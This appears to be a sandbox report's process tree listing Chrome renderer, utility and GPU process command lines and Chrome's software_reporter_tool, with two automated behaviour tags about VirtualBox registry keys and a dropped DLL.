    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2272 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5300 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5248 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1632 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3952 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=888 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=972 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3104 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:8
  C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\104.288.200\software_reporter_tool.exe
    "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\104.288.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=bT92GmuFwz+CeixYWRCTdwIPuPA00dhnw/p6lJiK --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=Off
    - Enumerates VirtualBox registry keys
    \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe
      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=104.288.200 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x7ff7fd9f2d20,0x7ff7fd9f2d30,0x7ff7fd9f2d40
    \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe
      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_41176_XREIPQVFQZXPCWEC" --sandboxed-process-id=2 --init-done-notifier=796 --sandbox-mojo-pipe-token=1794225446323783133 --mojo-platform-channel-handle=772 --engine=2
      - Enumerates VirtualBox registry keys
      - Loads dropped DLL
    \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe
      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_41176_XREIPQVFQZXPCWEC" --sandboxed-process-id=3 --init-done-notifier=1032 --sandbox-mojo-pipe-token=13250761345822872391 --mojo-platform-channel-handle=1028
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=888 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2292 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6048 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1632 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3056 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5880 /prefetch:2
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1624 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6280 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:12⤵
-
